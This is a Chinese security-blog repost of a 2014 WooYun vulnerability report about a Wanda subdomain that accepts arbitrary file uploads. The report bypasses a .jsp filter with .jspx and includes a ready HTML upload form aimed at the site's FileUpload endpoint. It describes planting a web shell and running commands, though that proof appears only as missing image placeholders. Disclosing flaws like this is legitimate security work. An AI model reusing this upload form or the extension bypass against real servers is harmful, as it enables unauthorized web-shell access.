记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

万达分站可以getshell

2014-05-27 07:05

http://wooyun.org/bugs/wooyun-2010-049385 此漏洞难道厂商还没补?我再来复测一遍

site: http://performance.wanda.cn

存在任意文件上传(其实还是限制了jsp的后缀,只不过没过滤jspx),jspx的shell需要修改下。

构造上传表单

<form enctype="multipart/form-data" action="http://www.wandaperformance.com/FileUpload" method="POST"> 

<input name="filedata" type="file" /><input type="submit" value="GO" /> </form>



aaa.png

漏洞证明:

执行命令:

bbb.png





ccc.png

修复方案:

看shell格式就知道是4.12日上传的,截止4.12日此洞存在!

shell已删,勿查水表!


知识来源: www.wooyun.org/bugs/wooyun-2014-056761

阅读:93367 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“万达分站可以getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云